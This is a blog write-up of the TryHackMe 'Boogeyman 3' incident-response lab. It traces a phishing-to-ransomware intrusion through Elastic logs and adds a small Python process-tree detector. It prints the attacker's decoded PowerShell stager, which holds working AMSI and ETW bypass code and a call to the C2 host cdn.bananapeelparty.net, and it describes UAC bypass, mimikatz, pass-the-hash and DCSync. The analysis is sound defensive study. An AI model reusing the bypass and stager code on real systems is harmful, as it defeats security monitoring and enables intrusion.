
TryHackMe: Boogeyman-3 Challenge


The Chaos Inside

Challenge Link:

Boogeyman 3

Lurking in the Dark

Without tripping any security defences of Quick Logistics LLC, the Boogeyman was able to compromise one of the employees and stayed in the dark, waiting for the right moment to continue the attack. Using this initial email access, the threat actors attempted to expand the impact by targeting the CEO, Evan Hutchinson.


The email appeared questionable, but Evan still opened the attachment despite the scepticism. After opening the attached document and seeing that nothing happened, Evan reported the phishing email to the security team.

Initial Investigation

Upon receiving the phishing email report, the security team investigated the workstation of the CEO. During this activity, the team discovered the email attachment in the downloads folder of the victim.


In addition, the security team also observed a file inside the ISO payload, as shown in the image below.


Lastly, it was presumed by the security team that the incident occurred between August 29 and August 30, 2023.

Given the initial findings, you are tasked to analyse and assess the impact of the compromise.

Log Analysis:

Open Elastic, go to the Discover menu, and set the incident time.


Let’s first identify the usernames and hosts in the log:


Initial Access 2023-08-29 23:51:15:

The downloaded file has a .pdf extension.

It was executed on the host WKSTN-0051.quicklogistics.org under the user evan.hutchinson. The process mshta.exe (Microsoft HTML Application Host) executes .hta files (HTML Applications), which can contain HTML plus script such as JavaScript or VBScript. Explorer.EXE (2940) spawned mshta.exe (6392), which executed the .pdf file. Now that we know the process, filter the logs for the mshta.exe process.


Execution:

The process mshta.exe spawned three processes (xcopy.exe, rundll32.exe, powershell.exe).

  • First process: xcopy.exe created a copy of a file named review.dat from D:\ to the Temp directory of the user Evan Hut.
  • Second process: rundll32.exe executed the DllRegisterServer function from the file D:\review.dat. DllRegisterServer is a standard function found in many DLLs, used for self-registration (it often writes to the registry).

Persistence 2023-08-29 23:51:16:

  • Third process: powershell.exe establishes persistence via a scheduled task. This PowerShell command creates a scheduled task named “Review” that runs daily at 6:00 AM, executing the suspicious DLL review.dat.
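The mshta.exe process tree described above (xcopy staging, rundll32 with DllRegisterServer, a scheduled task created from PowerShell) can be reconstructed from process-creation events rather than clicked through one filter at a time. This is an added example, not part of the original write-up: the events are constructed to mirror the chain, and the file paths, command-line switches and the benign sibling process are assumptions.

```python
import re
from typing import Any, Callable, Dict, List, Optional, Tuple

Event = Dict[str, Any]

# Constructed process-creation events (ECS-style field names shortened). They follow the
# chain in the write-up, but paths and switches are assumptions, not the challenge's logs.
EVENTS: List[Event] = [
    {"pid": 2940, "ppid": 1200, "name": "Explorer.EXE", "cmd": "C:\\Windows\\Explorer.EXE"},
    {"pid": 6392, "ppid": 2940, "name": "mshta.exe",
     "cmd": 'mshta.exe "C:\\Users\\evan\\Downloads\\attachment.pdf"'},
    {"pid": 6401, "ppid": 6392, "name": "xcopy.exe",
     "cmd": "xcopy /y D:\\review.dat C:\\Users\\evan\\AppData\\Local\\Temp\\"},
    {"pid": 6410, "ppid": 6392, "name": "rundll32.exe",
     "cmd": "rundll32.exe D:\\review.dat,DllRegisterServer"},
    {"pid": 6420, "ppid": 6392, "name": "powershell.exe",
     "cmd": "powershell.exe schtasks /create /sc daily /st 06:00 /tn Review "
            "/tr \"rundll32 C:\\Users\\evan\\AppData\\Local\\Temp\\review.dat,DllRegisterServer\""},
    {"pid": 7000, "ppid": 2940, "name": "notepad.exe", "cmd": "notepad.exe notes.txt"},  # benign
]

# Each rule is a label plus a predicate evaluated on every child of an mshta.exe process.
RULES: List[Tuple[str, Callable[[Event], bool]]] = [
    ("payload staged with xcopy", lambda e: e["name"].lower() == "xcopy.exe"),
    ("rundll32 invoking DllRegisterServer",
     lambda e: e["name"].lower() == "rundll32.exe" and "dllregisterserver" in e["cmd"].lower()),
    ("scheduled task created from PowerShell",
     lambda e: e["name"].lower() == "powershell.exe"
     and re.search(r"schtasks\s+/create|register-scheduledtask", e["cmd"], re.I) is not None),
]

def children_of(events: List[Event], ppid: int) -> List[Event]:
    return [e for e in events if e["ppid"] == ppid]

def mshta_findings(events: List[Event]) -> List[Tuple[int, int, str]]:
    """Return (mshta pid, child pid, label) for every mshta.exe child matching a rule."""
    findings: List[Tuple[int, int, str]] = []
    for parent in events:
        if parent["name"].lower() != "mshta.exe":
            continue
        for child in children_of(events, parent["pid"]):
            findings += [(parent["pid"], child["pid"], label) for label, match in RULES if match(child)]
    return findings

def scheduled_task_name(cmd: str) -> Optional[str]:
    """Pull the task name out of a schtasks /tn argument (None when there is none)."""
    m = re.search(r"/tn\s+\"?([^\s\"]+)", cmd, re.I)
    return m.group(1) if m else None

if __name__ == "__main__":
    for parent_pid, child_pid, label in mshta_findings(EVENTS):
        print(f"mshta {parent_pid} -> {child_pid}: {label}")
```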


Privilege Escalation & Defense Evasion 2023-08-29 23:54:49.213:

Investigate this review.dat file. We see the attacker execute a few commands to view the compromised user’s information. At the end, the attacker executed fodhelper.exe, which can be abused to bypass User Account Control (UAC).


Note that in the last execution, the attacker attempted lateral movement to WKSTN-1327 as allan.smith. Inspect the execution spawned by fodhelper.exe.


The process with process.pid 7116 reads, in its command line, a base64-encoded malicious script stored in a registry key and launches a second hidden PowerShell process, which decodes and executes that script. To see what this process spawns, search for ppid: 7116.


```powershell
If ($PSVersionTable.PSVersion.Major -ge 3) {
    # Defense evasion: flag AMSI as failed so this session's script content is no longer scanned
    $Ref = [Ref].Assembly.GetType('System.Management.Automation.AmsiUtils')
    $Ref.GetField('amsiInitFailed', 'NonPublic,Static').SetValue($Null, $true)

    # Defense evasion: switch off PowerShell's ETW log provider so the activity is not logged
    [System.Diagnostics.Eventing.EventProvider]
        .GetField('m_enabled', 'NonPublic,Instance')
        .SetValue(
            [Ref].Assembly
                .GetType('System.Management.Automation.Tracing.PSEtwLogProvider')
                .GetField('etwProvider', 'NonPublic,Static')
                .GetValue($null),
            0
        )
}

[System.Net.ServicePointManager]::Expect100Continue = 0
$wc = New-Object System.Net.WebClient

# Set the User-Agent string to look like a browser
$u = 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko'

# Decode and build the URL (the server string is stored as UTF-16LE base64)
$ser = ([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String(
    'aAB0AHQAcAA6AC8ALwBjAGQAbgAuAGIAYQBuAGEAbgBhAHAAZQBlAGwAccBhAHIAdAB5AC4AbgBlAHQAOgA4ADAA'
)))  # http://cdn.bananapeelparty.net:80

$t = '/news.php'

# Set headers and make the request through the system's default proxy and credentials
$wc.Headers.Add('User-Agent', $u)
$wc.Proxy = [System.Net.WebRequest]::DefaultWebProxy
$wc.Proxy.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials
```

This payload connects to the malicious domain http:[//]cdn.bananapeelparty.net:80/news.php and routes the request through the system's default web proxy and network credentials (DefaultWebProxy, DefaultNetworkCredentials) so the traffic blends in with normal browsing and passes proxy or firewall rules.

Credential Access & Discovery:

Following the execution of the malicious payload, the logs show the attacker running several enumeration commands. The attacker also used the PowerSploit framework, calling its Invoke-ShareFinder and Get-DomainUser functions for enumeration.


The attacker downloaded and executed the mimikatz tool to dump credentials and was able to pass the hash as the itadmin user. With this new user, the attacker accessed a file on a remote share named IT_Automation.ps1.

Lateral Movement & Command and Control 2023-08-30 00:19:52:


Using the credentials discovered in the IT_Automation.ps1 file, this PowerShell command runs a remote command on the machine WKSTN-1327 with the stored credentials. The attacker is now moving from host WKSTN-0051 to host WKSTN-1327 using allan.smith's credentials, so filter the log on that user. I filtered for -enc to see if any encoded commands were executed on the new host.


There is a command spawned by wsmprovhost.exe. After decoding, it appears to be another Empire stager executed using the same method. The attacker also downloaded and executed mimikatz on the second machine, which revealed the Domain Administrator account and its hash.


Search for the execution of the second stager that ran as the user allan.smith.


This executes a command on a local or remote computer. -ScriptBlock {hostname}: the block of code to run remotely; in this case it runs the hostname command, which returns the name of the computer. -ComputerName DC01.quicklogistics.org: specifies the target computer, here a Domain Controller (DC01) in the domain quicklogistics.org. To confirm the execution of the hostname command on the target computer, search for the HOSTNAME.exe process execution.


Filtering for wsmprovhost.exe confirms remote execution on DC01.


Filtering for the execution of the malicious payload on DC01, we see the attacker download and execute the mimikatz tool.


This performs a DCSync attack, which tricks the Domain Controller into treating the attacker as another DC and requests replication data, including the password hashes of the specified user (backupda).

Impact 2023-08-30 01:53:13:

After gaining full control of the domain quicklogistics.org, the attacker downloaded and executed a file named ransomboogey.exe, and did the same on both WKSTN-0051 and WKSTN-1327.


On the host WKSTN-1327, the ransomboogey.exe process was executed by the user itadmin. There was, however, no execution of the malicious process on the host WKSTN-0051.


This post is licensed under CC BY 4.0 by the author.